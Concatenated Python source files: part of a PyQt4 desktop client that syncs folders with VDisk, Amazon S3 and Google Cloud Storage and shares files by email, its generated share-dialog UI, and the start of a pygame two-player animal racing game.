self.s3_init()
self.gs_init()
# register the button function under the VDisk syn file-dir
QtCore.QObject.connect(self.ui.button_v_dir, QtCore.SIGNAL("clicked()"),
self.set_sync_path(self.ui.tvdirpath))
QtCore.QObject.connect(self.ui.button_v_submit, QtCore.SIGNAL("clicked()"),
self.vdisk_dir_submit)
QtCore.QObject.connect(self.ui.button_v_reset, QtCore.SIGNAL("clicked()"),
self.vdisk_dir_reset)
QtCore.QObject.connect(self.ui.button_v_cloudflush, QtCore.SIGNAL("clicked()"),
self.vdisk_cloud_flush)
QtCore.QObject.connect(self.ui.button_v_share, QtCore.SIGNAL("clicked()"),
self.vdisk_file_share)
QtCore.QObject.connect(self.ui.button_v_logflush, QtCore.SIGNAL("clicked()"),
self.vdisk_log_flush)
# register the button function under the S3 syn file-dir
QtCore.QObject.connect(self.ui.button_s_dir, QtCore.SIGNAL("clicked()"),
self.set_sync_path(self.ui.tsdirpath))
QtCore.QObject.connect(self.ui.button_s_submit, QtCore.SIGNAL("clicked()"),
self.s3_dir_submit)
QtCore.QObject.connect(self.ui.button_s_reset, QtCore.SIGNAL("clicked()"),
self.s3_dir_reset)
QtCore.QObject.connect(self.ui.button_s_cloudflush, QtCore.SIGNAL("clicked()"),
self.s3_cloud_flush)
QtCore.QObject.connect(self.ui.button_s_share, QtCore.SIGNAL("clicked()"),
self.s3_file_share)
QtCore.QObject.connect(self.ui.button_s_logflush, QtCore.SIGNAL("clicked()"),
self.s3_log_flush)
# register the button function under the googlecloud syn file-dir
QtCore.QObject.connect(self.ui.button_g_dir, QtCore.SIGNAL("clicked()"),
self.set_sync_path(self.ui.tgdirpath))
QtCore.QObject.connect(self.ui.button_g_submit, QtCore.SIGNAL("clicked()"),
self.gs_dir_submit)
QtCore.QObject.connect(self.ui.button_g_reset, QtCore.SIGNAL("clicked()"),
self.gs_dir_reset)
QtCore.QObject.connect(self.ui.button_g_cloudflush, QtCore.SIGNAL("clicked()"),
self.gs_cloud_flush)
QtCore.QObject.connect(self.ui.button_g_share, QtCore.SIGNAL("clicked()"),
self.gs_file_share)
QtCore.QObject.connect(self.ui.button_g_logflush, QtCore.SIGNAL("clicked()"),
self.gs_log_flush)
def get_holder(self, key, encrypt=False):
if encrypt:
holder = 'cldbkp_%s_encrypt' % str(key)
else:
holder = 'cldbkp_%s' % str(key)
return holder.lower()
def get_encrypt_code(self, key):
if len(key) >= 8:
return key[:8]
return key + '*' * (8 - len(key))
def alert(self, msg):
if isinstance(msg, str):
msg = msg.decode('utf-8')
errorbox = QtGui.QMessageBox()
errorbox.setText(QtCore.QString(msg))
errorbox.setWindowTitle(QtCore.QString(u"需要提醒您:"))
errorbox.exec_()
def status_set(self, button, status_label, welcome_info):
button.setText(QtCore.QString(u'正在同步...'))
if isinstance(welcome_info, str):
welcome_info = welcome_info.decode('utf-8')
status_label.setText(QtCore.QString(welcome_info))
def status_reset(self, button, status_label):
button.setText(QtCore.QString(u'开始同步'))
status_label.setText(QtCore.QString(u'用户登录状态'))
def choose_dir(self):
"""
provide a dialog for the user to get the folder
"""
fd = QtGui.QFileDialog(self)
filedir = fd.getExistingDirectory(parent=None, caption="File Dir")
return filedir
def set_sync_path(self, ui):
def _action():
dir_ = self.choose_dir()
ui.setText(dir_)
return _action
def add_root_to_cloud_browser(self, ui):
root = QtGui.QTreeWidgetItem(ui)
root.setText(0, QtCore.QString(u'根目录'))
return root
def get_cloud_path(self, tree):
'''
get the cloud path of the selected file
'''
items = tree.selectedItems()
try:
path = items[0].toolTip(0)
path = unicode(path).encode('utf-8')
name = unicode(items[0].text(0)).encode('utf-8')
return path, name
except IndexError, e:
self.alert(u'请选择要分享的文件!')
return
except Exception, e:
self.alert(u'分享错误,请选择要分享的文件!')
return
def vdisk_init(self):
if self.vdisk_info is None:
return
if not os.path.exists(self.vdisk_info['local_folder']):
success= False
else:
success = self.vdisk_setup(**self.vdisk_info)
if success:
self.ui.tvdirpath.setText(
QtCore.QString(self.vdisk_info['local_folder']))
self.status_set(self.ui.button_v_submit,
self.ui.lvuserstate,
"Hello, 微盘用户 %s" % self.vdisk_info['account'])
else:
self.env.remove_vdisk_info()
self.vdisk_info = None
def vdisk_dir_reset(self):
"""
stop the current syn folder , clear all the associated info
"""
self.ui.tvdirpath.clear()
if self.vdisk_cloud_browser_thread:
self.vdisk_cloud_browser_thread.stop()
if self.vdisk_log_thread:
self.vdisk_log_thread.stop()
self.ui.VtreeWidget.clear()
self.ui.VlogTreeWidget.clear()
self.env.stop_vdisk()
self.vdisk_info = None
self.status_reset(self.ui.button_v_submit,
self.ui.lvuserstate)
def vdisk_dir_submit(self):
"""
submit the cloud info so that the selected folder become the syn folder
"""
if len(unicode(self.ui.tvdirpath.text()).encode('utf-8').decode('utf-8')) == 0:
self.alert(u"同步文件夹不能为空!")
return
if not os.path.exists(unicode(self.ui.tvdirpath.text()).encode('utf-8').decode('utf-8')):
self.alert(u"你所设置的路径不存在!")
return
if not self.vdisk_info:
self.vlogin = QtGui.QDialog()
self.vlogin.ui = VDiskLogin_UI.Ui_VDiskCloudLoginUI()
self.vlogin.ui.setupUi(self.vlogin)
QtCore.QObject.connect(self.vlogin.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.vdisk_login_submit)
QtCore.QObject.connect(self.vlogin.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.vdisk_login_reset)
self.vlogin.exec_()
else:
info = dict(self.vdisk_info)
info['local_folder'] = unicode(self.ui.tvdirpath.text()).encode('utf-8').decode('utf-8')
success = self.vdisk_setup(**info)
if not success:
self.alert('登录失败!')
def vdisk_login_submit(self):
"""
submit the cloud info to the cloud , show the files and the logs that synchronized with the cloud
"""
user = str(self.vlogin.ui.tvuser.text())
pwd = str(self.vlogin.ui.tvpwd.text())
is_weibo = self.vlogin.ui.tvisweibo.isChecked()
encrypt = self.vlogin.ui.tvencrypt.isChecked()
local_folder = unicode(self.ui.tvdirpath.text()).encode('utf-8').decode('utf-8')
success = self.vdisk_setup(user, pwd, local_folder, is_weibo, encrypt)
if success:
self.status_set(self.ui.button_v_submit,
self.ui.lvuserstate,
"Hello, 微盘用户 %s" % self.vdisk_info['account'])
self.vlogin.close()
else:
self.alert('登录失败!')
def vdisk_setup(self, account, password, local_folder,
is_weibo=False, encrypt=False, encrypt_code=None, **kwargs):
"""
use the info of the cloud submitted to setup the cloud storage syn folder
"""
try:
args = locals()
del args['self']
force_stop = False
if self.vdisk_info is not None:
for k, v in args.iteritems():
if k in self.vdisk_info and self.vdisk_info[k] != v:
force_stop = True
break
holder = self.get_holder(account, encrypt)
encrypt_code = self.get_encrypt_code(account) if encrypt else None
self.vdisk_handler = self.env.setup_vdisk(
account, password, local_folder, holder,
is_weibo=is_weibo, encrypt=encrypt, encrypt_code=encrypt_code,
force_stop=force_stop)
if force_stop or self.vdisk_info is None:
self.vdisk_info = args
self.vdisk_cloud_flush()
self.vdisk_show_logs()
return True
except VdiskError:
return False
def vdisk_show_logs(self):
"""
show the logs about files that synchronized with the cloud
"""
try:
self.vdisk_log_thread_lock.acquire()
if self.vdisk_log_thread and not self.vdisk_log_thread.finished:
self.vdisk_log_thread.stop()
self.vdisk_log_thread.wait()
self.ui.VlogTreeWidget.clearSelection()
self.ui.VlogTreeWidget.clear()
self.vdisk_log_thread = LogFlushThread(self.ui.VlogTreeWidget, self.vdisk_handler)
self.vdisk_log_thread.start()
finally:
self.vdisk_log_thread_lock.release()
def vdisk_login_reset(self):
"""
clear the info about the account in the cloud
"""
self.vlogin.ui.tvpwd.clear()
self.vlogin.ui.tvuser.clear()
def vdisk_cloud_flush(self):
'''
Flush the cloud fiels.
'''
self.vdisk_cloud_browser_thread_lock.acquire()
try:
if self.vdisk_handler is None:
return
if self.vdisk_cloud_browser_thread \
and not self.vdisk_cloud_browser_thread.finished:
self.vdisk_cloud_browser_thread.stop()
self.vdisk_cloud_browser_thread.exit()
self.vdisk_cloud_browser_thread.wait()
self.ui.VtreeWidget.clearSelection()
self.ui.VtreeWidget.clear()
self.vdisk_cloud_browser_thread = CloudBrowserFlushThread(
self, self.ui.VtreeWidget, self.vdisk_handler)
self.vdisk_cloud_browser_thread.start()
finally:
self.vdisk_cloud_browser_thread_lock.release()
def vdisk_file_share(self):
"""
share a syn file to others by email
"""
if self.vdisk_handler is None:
return
result = self.get_cloud_path(self.ui.VtreeWidget)
if result is None:
return
vdisk_file_path, vdisk_file_name = result
if vdisk_file_path is None or len(str(vdisk_file_path)) == 0:
self.alert('不支持文件夹分享,请选择文件')
return
self.vshare = QtGui.QDialog()
self.vshare.ui = VDiskShare_UI.Ui_Vdisk_Share()
self.vshare.ui.setupUi(self.vshare)
storage = self.vdisk_handler.storage
try:
sharepath = storage.share(vdisk_file_path.decode('utf-8'))
except VdiskError, e:
self.alert(e.msg)
self.vshare.ui.textareav.setText(QtCore.QString(
u'微盘用户%s通过邮件向你分享文件“%s”,下载地址:%s' % \
(self.vdisk_info['account'], vdisk_file_name.decode('utf-8'), sharepath))
)
QtCore.QObject.connect(self.vshare.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.vdisk_share_submit)
QtCore.QObject.connect(self.vshare.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.vdisk_share_reset)
QtCore.QObject.connect(self.vshare.ui.button_exit, QtCore.SIGNAL("clicked()"),
self.vdisk_share_exit)
self.vshare.exec_()
def vdisk_share_submit(self):
"""
submit the info about the email
"""
if self.vdisk_handler != None:
receivers = str(self.vshare.ui.tvrec.text())
receivers = receivers.replace(',', ',').split(',')
email = CloudBackup.mail.send_mail(receivers, unicode(self.vshare.ui.tvtopic.text()).encode('utf-8'),
unicode(self.vshare.ui.textareav.toPlainText()).encode('utf-8'))
if email:
self.vshare.close()
self.alert(u'发送成功!')
else:
self.alert(u'发送失败!')
else:
return
def vdisk_share_reset(self):
"""
clear the info about the email
"""
self.vshare.ui.textareav.clear()
self.vshare.ui.tvrec.clear()
self.vshare.ui.tvtopic.clear()
def vdisk_share_exit(self):
"""
exit the email window
"""
self.vshare.close()
def vdisk_log_flush(self):
"""
flush the log display
"""
self.vdisk_show_logs()
def s3_init(self):
if self.s3_info is None:
return
if not os.path.exists(self.s3_info['local_folder']):
success= False
else:
success = self.s3_setup(**self.s3_info)
if success:
self.ui.tsdirpath.setText(
QtCore.QString(self.s3_info['local_folder']))
self.status_set(self.ui.button_s_submit,
self.ui.lsuserstate,
"Hello, Amazon S3用户 %s" % self.s3_display_name)
else:
self.env.remove_s3_info()
self.s3_info = None
def s3_dir_reset(self):
"""
stop the current syn folder , clear all the associated info
"""
self.ui.tsdirpath.clear()
if self.s3_cloud_browser_thread:
self.s3_cloud_browser_thread.stop()
if self.s3_log_thread:
self.s3_log_thread.stop()
self.ui.StreeWidget.clear()
self.ui.SlogTreeWidget.clear()
self.env.stop_s3()
self.s3_info = None
self.status_reset(self.ui.button_s_submit,
self.ui.lsuserstate)
def s3_dir_submit(self):
"""
submit the cloud info so that the selected folder become the syn folder
"""
if len(unicode(self.ui.tsdirpath.text()).encode('utf-8').decode('utf-8')) == 0:
self.alert(u"同步文件夹不能为空!")
return
if not os.path.exists(unicode(self.ui.tsdirpath.text()).encode('utf-8').decode('utf-8')):
self.alert(u"你所设置的路径不存在!")
return
if not self.s3_info:
self.slogin = QtGui.QDialog()
self.slogin.ui = S3Login_UI.Ui_S3CloudLoginUI()
self.slogin.ui.setupUi(self.slogin)
QtCore.QObject.connect(self.slogin.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.s3_login_submit)
QtCore.QObject.connect(self.slogin.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.s3_login_reset)
self.slogin.exec_()
else:
info = dict(self.s3_info)
info['local_folder'] = unicode(self.ui.tsdirpath.text()).encode('utf-8').decode('utf-8')
success = self.s3_setup(**info)
if not success:
self.alert('登录失败!')
def s3_login_submit(self):
"""
submit the cloud info to the cloud , show the files and the logs that synchronized with the cloud
"""
access_key = str(self.slogin.ui.ts_access_key.text())
secret_access_key = str(self.slogin.ui.ts_secret_access_key.text())
local_folder = unicode(self.ui.tsdirpath.text()).encode('utf-8').decode('utf-8')
encrypt = self.slogin.ui.lsencrypt.isChecked()
success = self.s3_setup(access_key, secret_access_key, local_folder, encrypt)
if success:
self.status_set(self.ui.button_s_submit,
self.ui.lsuserstate,
"Hello, Amazon S3用户 %s" % self.s3_display_name)
self.slogin.close()
else:
self.alert('登录失败!')
def s3_setup(self, access_key, secret_access_key, local_folder,
encrypt=False, encrypt_code=None, **kwargs):
"""
use the info of the cloud submitted to setup the cloud storage syn folder
"""
try:
args = locals()
del args['self']
force_stop = False
if self.s3_info is not None:
for k, v in args.iteritems():
if k in self.s3_info and self.s3_info[k] != v:
force_stop = True
break
holder = self.get_holder(access_key, encrypt)
encrypt_code = self.get_encrypt_code(access_key) if encrypt else None
self.s3_handler = self.env.setup_s3(
access_key, secret_access_key, local_folder, holder,
encrypt=encrypt, encrypt_code=encrypt_code, force_stop=force_stop)
if force_stop or self.s3_info is None:
self.s3_info = args
self.s3_cloud_flush()
self.s3_show_logs()
self.s3_display_name = self.s3_handler.storage.client.list_buckets()[0].display_name
return True
except S3Error:
return False
def s3_show_logs(self):
"""
show the logs about files that synchronized with the cloud
"""
try:
self.s3_log_thread_lock.acquire()
if self.s3_log_thread and not self.s3_log_thread.finished:
self.s3_log_thread.stop()
self.s3_log_thread.wait()
self.ui.SlogTreeWidget.clearSelection()
self.ui.SlogTreeWidget.clear()
self.s3_log_thread = LogFlushThread(self.ui.SlogTreeWidget, self.s3_handler)
self.s3_log_thread.start()
finally:
self.s3_log_thread_lock.release()
def s3_login_reset(self):
"""
clear the info about the account in the cloud
"""
self.slogin.ui.ts_access_key.clear()
self.slogin.ui.ts_secret_access_key.clear()
def s3_cloud_flush(self):
'''
Flush the cloud fiels.
'''
self.s3_cloud_browser_thread_lock.acquire()
try:
if self.s3_handler is None:
return
if self.s3_cloud_browser_thread \
and not self.s3_cloud_browser_thread.finished:
self.s3_cloud_browser_thread.stop()
self.s3_cloud_browser_thread.wait()
self.ui.StreeWidget.clearSelection()
self.ui.StreeWidget.clear()
self.s3_cloud_browser_thread = CloudBrowserFlushThread(
self, self.ui.StreeWidget, self.s3_handler)
self.s3_cloud_browser_thread.start()
finally:
self.s3_cloud_browser_thread_lock.release()
def s3_file_share(self):
"""
share a syn file to others by email
"""
if self.s3_handler is None:
return
result = self.get_cloud_path(self.ui.StreeWidget)
if result is None:
return
s3_file_path, s3_file_name = result
if s3_file_path is None or len(str(s3_file_path)) == 0:
self.alert('不支持文件夹分享,请选择文件')
return
self.sshare = QtGui.QDialog()
self.sshare.ui = S3Share_UI.Ui_S3_Share()
self.sshare.ui.setupUi(self.sshare)
storage = self.s3_handler.storage
sharepath = storage.share(s3_file_path)
self.sshare.ui.textareas.setText(QtCore.QString(
u'Amazon S3用户%s通过邮件向你分享文件“%s”,下载地址:%s' % \
(self.s3_display_name, s3_file_name, sharepath))
)
QtCore.QObject.connect(self.sshare.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.s3_share_submit)
QtCore.QObject.connect(self.sshare.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.s3_share_reset)
QtCore.QObject.connect(self.sshare.ui.button_exit, QtCore.SIGNAL("clicked()"),
self.s3_share_exit)
self.sshare.exec_()
def s3_share_submit(self):
"""
submit the info about the email
"""
if self.s3_handler != None:
receivers = str(self.sshare.ui.tsrec.text())
receivers = receivers.replace(',', ',').split(',')
email = CloudBackup.mail.send_mail(receivers, unicode(self.sshare.ui.tstopic.text()).encode('utf-8'),
unicode(self.sshare.ui.textareas.toPlainText()).encode('utf-8'))
if email:
self.sshare.close()
self.alert("发送成功!")
else:
self.alert("发送失败!")
else:
return
def s3_share_reset(self):
"""
clear the info about the email
"""
self.sshare.ui.textareas.clear()
self.sshare.ui.tsrec.clear()
self.sshare.ui.tstopic.clear()
def s3_share_exit(self):
"""
exit the email window
"""
self.sshare.close()
def s3_log_flush(self):
"""
flush the log display
"""
self.s3_show_logs()
def gs_init(self):
if self.gs_info is None:
return
if not os.path.exists(self.gs_info['local_folder']):
success= False
else:
success = self.gs_setup(**self.gs_info)
if success:
self.ui.tgdirpath.setText(
QtCore.QString(self.gs_info['local_folder']))
self.status_set(self.ui.button_g_submit,
self.ui.lguserstate,
"Hello, Google云存储用户")
else:
self.env.remove_gs_info()
self.gs_info = None
def gs_dir_reset(self):
"""
stop the current syn folder , clear all the associated info
"""
self.ui.tgdirpath.clear()
if self.gs_cloud_browser_thread:
self.gs_cloud_browser_thread.stop()
if self.gs_log_thread:
self.gs_log_thread.stop()
self.ui.GtreeWidget.clear()
self.ui.GlogTreeWidget.clear()
self.env.stop_gs()
self.gs_info = None
self.status_reset(self.ui.button_g_submit,
self.ui.lguserstate)
def gs_dir_submit(self):
"""
submit the cloud info so that the selected folder become the syn folder
"""
if len(unicode(self.ui.tgdirpath.text()).encode('utf-8').decode('utf-8')) == 0:
self.alert(u"同步文件夹不能为空!")
return
if not os.path.exists(unicode(self.ui.tgdirpath.text()).encode('utf-8').decode('utf-8')):
self.alert(u"你所设置的路径不存在!")
return
if not self.gs_info:
self.glogin = QtGui.QDialog()
self.glogin.ui = GoogleCloudLogin_UI.Ui_GoogleCloudLoginUI()
self.glogin.ui.setupUi(self.glogin)
QtCore.QObject.connect(self.glogin.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.gs_login_submit)
QtCore.QObject.connect(self.glogin.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.gs_login_reset)
self.glogin.exec_()
else:
info = dict(self.gs_info)
info['local_folder'] = unicode(self.ui.tgdirpath.text()).encode('utf-8').decode('utf-8')
success = self.gs_setup(**info)
if not success:
self.alert('登录失败!')
def gs_login_submit(self):
"""
submit the cloud info to the cloud , show the files and the logs that synchronized with the cloud
"""
access_key = str(self.glogin.ui.tg_access_key.text())
secret_access_key = str(self.glogin.ui.tg_secret_access_key.text())
project_id = str(self.glogin.ui.tg_project_id.text())
local_folder = unicode(self.ui.tgdirpath.text()).encode('utf-8').decode('utf-8')
encrypt = self.glogin.ui.tgencrypt.isChecked()
success = self.gs_setup(access_key, secret_access_key, project_id, local_folder, encrypt)
if success:
self.status_set(self.ui.button_g_submit,
self.ui.lguserstate,
"Hello, Google云存储用户")
self.glogin.close()
else:
self.alert('登录失败!')
def gs_setup(self, access_key, secret_access_key, project_id, local_folder,
encrypt=False, encrypt_code=None, **kwargs):
"""
use the info of the cloud submitted to setup the cloud storage syn folder
"""
try:
args = locals()
del args['self']
force_stop = False
if self.gs_info is not None:
for k, v in args.iteritems():
if k in self.gs_info and self.gs_info[k] != v:
force_stop = True
break
holder = self.get_holder(access_key, encrypt)
encrypt_code = self.get_encrypt_code(access_key) if encrypt else None
self.gs_handler = self.env.setup_gs(
access_key, secret_access_key, project_id, local_folder, holder,
encrypt=encrypt, encrypt_code=encrypt_code, force_stop=force_stop)
if force_stop or self.gs_info is None:
self.gs_info = args
self.gs_cloud_flush()
self.gs_show_logs()
return True
except GSError:
self.alert('登录失败!')
return False
def gs_show_logs(self):
"""
show the logs about files that synchronized with the cloud
"""
try:
self.gs_log_thread_lock.acquire()
if self.gs_log_thread and not self.gs_log_thread.finished:
self.gs_log_thread.stop()
self.gs_log_thread.wait()
self.ui.GlogTreeWidget.clearSelection()
self.ui.GlogTreeWidget.clear()
self.gs_log_thread = LogFlushThread(self.ui.GlogTreeWidget, self.gs_handler)
self.gs_log_thread.start()
finally:
self.gs_log_thread_lock.release()
def gs_login_reset(self):
"""
clear the info about the account in the cloud
"""
self.glogin.ui.tg_access_key.clear()
self.glogin.ui.tg_secret_access_key.clear()
self.glogin.ui.tg_project_id.clear()
def gs_cloud_flush(self):
'''
Flush the cloud fiels.
'''
self.gs_cloud_browser_thread_lock.acquire()
try:
if self.gs_handler is None:
return
if self.gs_cloud_browser_thread \
and not self.gs_cloud_browser_thread.finished:
self.gs_cloud_browser_thread.stop()
self.gs_cloud_browser_thread.wait()
self.ui.GtreeWidget.clearSelection()
self.ui.GtreeWidget.clear()
self.gs_cloud_browser_thread = CloudBrowserFlushThread(
self, self.ui.GtreeWidget, self.gs_handler)
self.gs_cloud_browser_thread.start()
finally:
self.gs_cloud_browser_thread_lock.release()
def gs_file_share(self):
"""
share a syn file to others by email
"""
if self.gs_handler is None:
return
result = self.get_cloud_path(self.ui.GtreeWidget)
if result is None:
return
gs_file_path, gs_file_name = result
if gs_file_path is None or len(str(gs_file_path)) == 0:
self.alert('不支持文件夹分享,请选择文件')
return
self.gshare = QtGui.QDialog()
self.gshare.ui = GoogleCloudShare_UI.Ui_GoogleCloud_Share()
self.gshare.ui.setupUi(self.gshare)
storage = self.gs_handler.storage
sharepath = storage.share(gs_file_path)
self.gshare.ui.textareag.setText(QtCore.QString(
u'Google云存储用户(id: %s)通过邮件向你分享文件“%s”,下载地址:%s' % \
(self.gs_info['access_key'], gs_file_name.decode('utf-8'), sharepath.decode('utf-8')))
)
QtCore.QObject.connect(self.gshare.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.gs_share_submit)
QtCore.QObject.connect(self.gshare.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.gs_share_reset)
QtCore.QObject.connect(self.gshare.ui.button_exit, QtCore.SIGNAL("clicked()"),
self.gs_share_exit)
self.gshare.exec_()
def gs_share_submit(self):
"""
submit the info about the email
"""
if self.gs_handler != None:
receivers = str(self.gshare.ui.tgrec.text())
receivers = receivers.replace(',', ',').split(',')
email = CloudBackup.mail.send_mail(receivers,unicode(self.gshare.ui.tgtopic.text()).encode('utf-8'),
unicode(self.gshare.ui.textareag.toPlainText()).encode('utf-8'))
if email:
self.gshare.close()
self.alert("发送成功!")
else:
self.alert("发送失败!")
else:
return
def gs_share_reset(self):
"""
clear the info about the email
"""
self.gshare.ui.textareag.clear()
self.gshare.ui.tgrec.clear()
self.gshare.ui.tgtopic.clear()
def gs_share_exit(self):
"""
exit the email window
"""
self.gshare.close()
def gs_log_flush(self):
"""
flush the log display
"""
self.gs_show_logs()
```
#### File: CloudBackup/ui/S3Share_UI.py
```python
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_S3_Share(object):
def setupUi(self, S3_Share):
S3_Share.setObjectName(_fromUtf8("S3_Share"))
S3_Share.resize(400, 327)
self.button_submit = QtGui.QPushButton(S3_Share)
self.button_submit.setGeometry(QtCore.QRect(40, 280, 93, 28))
self.button_submit.setObjectName(_fromUtf8("button_submit"))
self.button_exit = QtGui.QPushButton(S3_Share)
self.button_exit.setGeometry(QtCore.QRect(270, 280, 93, 28))
self.button_exit.setObjectName(_fromUtf8("button_exit"))
self.button_reset = QtGui.QPushButton(S3_Share)
self.button_reset.setGeometry(QtCore.QRect(160, 280, 93, 28))
self.button_reset.setObjectName(_fromUtf8("button_reset"))
self.formLayoutWidget = QtGui.QWidget(S3_Share)
self.formLayoutWidget.setGeometry(QtCore.QRect(40, 20, 321, 54))
self.formLayoutWidget.setObjectName(_fromUtf8("formLayoutWidget"))
self.formLayout = QtGui.QFormLayout(self.formLayoutWidget)
self.formLayout.setMargin(0)
self.formLayout.setHorizontalSpacing(15)
self.formLayout.setVerticalSpacing(10)
self.formLayout.setObjectName(_fromUtf8("formLayout"))
self.lsrec = QtGui.QLabel(self.formLayoutWidget)
self.lsrec.setObjectName(_fromUtf8("lsrec"))
self.formLayout.setWidget(0, QtGui.QFormLayout.LabelRole, self.lsrec)
self.tsrec = QtGui.QLineEdit(self.formLayoutWidget)
self.tsrec.setObjectName(_fromUtf8("tsrec"))
self.formLayout.setWidget(0, QtGui.QFormLayout.FieldRole, self.tsrec)
self.lstopic = QtGui.QLabel(self.formLayoutWidget)
self.lstopic.setObjectName(_fromUtf8("lstopic"))
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.lstopic)
self.tstopic = QtGui.QLineEdit(self.formLayoutWidget)
self.tstopic.setObjectName(_fromUtf8("tstopic"))
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.tstopic)
self.verticalLayoutWidget = QtGui.QWidget(S3_Share)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(40, 80, 321, 21))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.lscontext = QtGui.QLabel(self.verticalLayoutWidget)
self.lscontext.setObjectName(_fromUtf8("lscontext"))
self.verticalLayout.addWidget(self.lscontext)
self.verticalLayoutWidget_2 = QtGui.QWidget(S3_Share)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(40, 110, 321, 151))
self.verticalLayoutWidget_2.setObjectName(_fromUtf8("verticalLayoutWidget_2"))
self.verticalLayout_2 = QtGui.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout_2.setMargin(0)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.textareas = QtGui.QTextEdit(self.verticalLayoutWidget_2)
self.textareas.setObjectName(_fromUtf8("textareas"))
self.verticalLayout_2.addWidget(self.textareas)
self.retranslateUi(S3_Share)
QtCore.QMetaObject.connectSlotsByName(S3_Share)
def retranslateUi(self, S3_Share):
S3_Share.setWindowTitle(QtGui.QApplication.translate("S3_Share", "S3用户分享", None, QtGui.QApplication.UnicodeUTF8))
self.button_submit.setText(QtGui.QApplication.translate("S3_Share", "确定", None, QtGui.QApplication.UnicodeUTF8))
self.button_exit.setText(QtGui.QApplication.translate("S3_Share", "退出", None, QtGui.QApplication.UnicodeUTF8))
self.button_reset.setText(QtGui.QApplication.translate("S3_Share", "重置", None, QtGui.QApplication.UnicodeUTF8))
self.lsrec.setText(QtGui.QApplication.translate("S3_Share", "收件人", None, QtGui.QApplication.UnicodeUTF8))
self.tsrec.setToolTip(QtGui.QApplication.translate("S3_Share", "多个邮件之间用逗号隔开", None, QtGui.QApplication.UnicodeUTF8))
self.lstopic.setText(QtGui.QApplication.translate("S3_Share", "主题", None, QtGui.QApplication.UnicodeUTF8))
self.tstopic.setText(QtGui.QApplication.translate("S3_Share", "通过CloudBackup分享文件", None, QtGui.QApplication.UnicodeUTF8))
self.lscontext.setText(QtGui.QApplication.translate("S3_Share", "内容", None, QtGui.QApplication.UnicodeUTF8))
``` |
{
"source": "520luigi/Animal-Mashing",
"score": 3
} |
#### File: 520luigi/Animal-Mashing/Animal-Mashing.py
```python
import pygame
import random
import sys
import os
def resource_path(path):
if hasattr(sys, '_MEIPASS'):
return os.path.join(sys._MEIPASS, path)
return os.path.join(os.path.abspath("."), path)
pygame.init()
#Declare some rgb color variables for ease of use.
red = (255, 0, 0)
green = (0, 255, 0)
black = (0, 0, 0)
white = (255, 255, 255)
#Display width and height made to the background image resolution
display_width = 736
display_height = 600
#Set finish line to be fraction of window height and increments per key pressed
finish_line = display_height/13
increment = 10
#Specific calling of pygame window to set width and height
win = pygame.display.set_mode((display_width, display_height))
#Display the caption on top of pygame window top banner
pygame.display.set_caption("Animal Mashing")
#Set positions of background image, startup menu to the top left corner
img_pos = [0, 0]
#Load and set up background image and startup menu
bg_image = pygame.image.load(resource_path("graphics/bgimage.png")).convert()
startup_image = pygame.image.load(resource_path("graphics/startmenu.png")).convert()
p1_wins = pygame.image.load(resource_path("graphics/p1win.png")).convert_alpha()
p2_wins = pygame.image.load(resource_path("graphics/p2win.png")).convert_alpha()
#Initialize sounds for player clicks, winner, players, intro countdown, etc
bg_music = pygame.mixer.Sound(resource_path("sounds/FrozenJam.ogg"))
bg_music.set_volume(0.4)
p1_click = pygame.mixer.Sound(resource_path("sounds/jingle1.ogg"))
p1_click.set_volume(0.4)
p2_click = pygame.mixer.Sound(resource_path("sounds/jingle2.ogg"))
p2_click.set_volume(0.4)
winner_sound = pygame.mixer.Sound(resource_path("sounds/flawless_victory.ogg"))
p1_sound = pygame.mixer.Sound(resource_path("sounds/player_1.ogg"))
p2_sound = pygame.mixer.Sound(resource_path("sounds/player_2.ogg"))
prepare_yourself = pygame.mixer.Sound(resource_path("sounds/prepare_yourself.ogg"))
one = pygame.mixer.Sound(resource_path("sounds/1.ogg"))
two = pygame.mixer.Sound(resource_path("sounds/2.ogg"))
three = pygame.mixer.Sound(resource_path("sounds/3.ogg"))
begin = pygame.mixer.Sound(resource_path("sounds/begin.ogg"))
def change_animal():
#Create a string array of animals to choose from randomly per game reset
animals = [resource_path("graphics/chick.png"), resource_path("graphics/horse.png"), resource_path("graphics/pig.png"),
resource_path("graphics/elephant.png"), resource_path("graphics/parrot.png"), resource_path("graphics/duck.png"),
resource_path("graphics/hippo.png"), resource_path("graphics/penguin.png"), resource_path("graphics/whale.png")]
player1_animal = random.choice(animals)
player2_animal = random.choice(animals)
#Prevent players from having the same animal
while player1_animal == player2_animal:
player2_animal = random.choice(animals)
#Load and set up players animal
player1_image = pygame.image.load(player1_animal).convert()
player1_image.set_colorkey(black)
player2_image = pygame.image.load(player2_animal).convert()
player2_image.set_colorkey(black)
return (player1_image, player2_image)
def set_position():
#Players location stored in arrays
x = [display_width/3, display_width * 0.61]
y = [display_height * 2/3 - 20, display_height * 2/3 - 20]
return (x[0], y[0], x[1], y[1])
def show_victory_screen(message, sound_number):
#Show victory screen and play the sounds according to who won
winner_sound.play()
pygame.time.delay(2000)
if sound_number == 1:
win.blit(p1_wins, img_pos)
p1_sound.play()
elif sound_number == 2:
win.blit(p2_wins, img_pos)
p2_sound.play()
pygame.display.flip()
waiting = True
while waiting:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
